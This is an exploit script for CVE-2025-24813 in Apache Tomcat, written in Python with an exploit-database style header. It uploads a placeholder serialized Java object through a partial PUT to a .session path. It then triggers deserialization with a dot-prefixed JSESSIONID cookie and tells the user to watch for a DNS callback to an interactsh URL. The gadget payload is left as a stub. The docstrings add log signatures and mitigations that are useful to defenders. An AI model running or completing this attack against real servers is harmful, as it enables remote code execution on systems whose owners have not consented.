# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference: https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
import requests
import random
import string
import sys
def rand_filename(length=6):
    """Return a random name made of *length* lowercase ASCII letters.

    The name is used by exploit() as the base of the uploaded file and of
    the session identifier, so every run produces a different path.
    """
    alphabet = string.ascii_lowercase
    picked = random.choices(alphabet, k=length)
    return ''.join(picked)
def generate_payload(interact_url):
    """Return the placeholder that stands in for a serialized Java object.

    The returned value is a 7-character str: the four code points
    0xAC 0xED 0x00 0x05 (the Java object-serialization stream magic and
    version) followed by a literal "...". The author describes the intended
    content as a gadget that causes a DNS interaction, but no gadget chain
    is included in this listing and *interact_url* is not used here.

    Detection note: a PUT request body that starts with AC ED 00 05 is a
    serialized Java object and is worth alerting on at a WAF or proxy.
    """
    # Placeholder left by the author; only the stream header is present.
    stream_header_placeholder = f'\xac\xed\x00\x05...'
    return stream_header_placeholder
def exploit(target, interact_url):
    """Send the two-request sequence described for CVE-2025-24813.

    Request 1 is a PUT with a Content-Range header to
    ``{target}/<random>.session``; the function continues only if the
    server answers 201. Request 2 is a GET to ``{target}/<random>`` carrying
    the cookie ``JSESSIONID=.<random>``. The GET response is not inspected;
    the caller is told to watch for a DNS callback instead.

    Defender notes:
    - Log signature: a PUT carrying Content-Range to a path ending in
      ``.session`` that returns 201, followed by a GET whose JSESSIONID
      cookie value starts with a dot.
    - Per the vendor advisory, the issue needs writes enabled on the default
      servlet (disabled by default), partial PUT support, file-based session
      persistence at the default location, and a library usable for
      deserialization on the classpath. Upgrading to a fixed release or
      keeping the default servlet read-only removes the precondition.
    """
    name = rand_filename()
    upload_url = f"{target}/{name}.session"
    trigger_url = f"{target}/{name}"
    # A Content-Range header on a PUT marks it as a partial PUT.
    upload_headers = {
        "Content-Range": "bytes 0-452/457",
        "Content-Type": "application/octet-stream"
    }
    body = generate_payload(interact_url)

    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")
    print(f"[+] Uploading payload to: {upload_url}")

    upload_response = requests.put(upload_url, data=body, headers=upload_headers)
    # Anything other than 201 Created means the server did not accept the write.
    if upload_response.status_code != 201:
        print(f"[-] Upload failed with status: {upload_response.status_code}")
        return
    print("[+] Payload uploaded successfully.")

    print(f"[+] Triggering payload via: {trigger_url}")
    # The cookie value is the uploaded name with a leading dot.
    session_cookie = {"JSESSIONID": f".{name}"}
    requests.get(trigger_url, cookies=session_cookie)
    print(f"[+] Trigger request sent. Check for DNS callback to: {interact_url}")
if __name__ == "__main__":
    # Banner is printed here and again inside exploit().
    for banner_line in ("[+] Exploit for CVE-2025-24813", "[+] Made By Al Baradi Joy\n"):
        print(banner_line)

    # Both values are read interactively and passed through unchanged.
    target_prompt = "Enter the target domain (e.g., http://localhost:8080): "
    interact_prompt = "Enter your interactsh URL: "
    target_url = input(target_prompt)
    interact_url = input(interact_prompt)

    exploit(target_url, interact_url)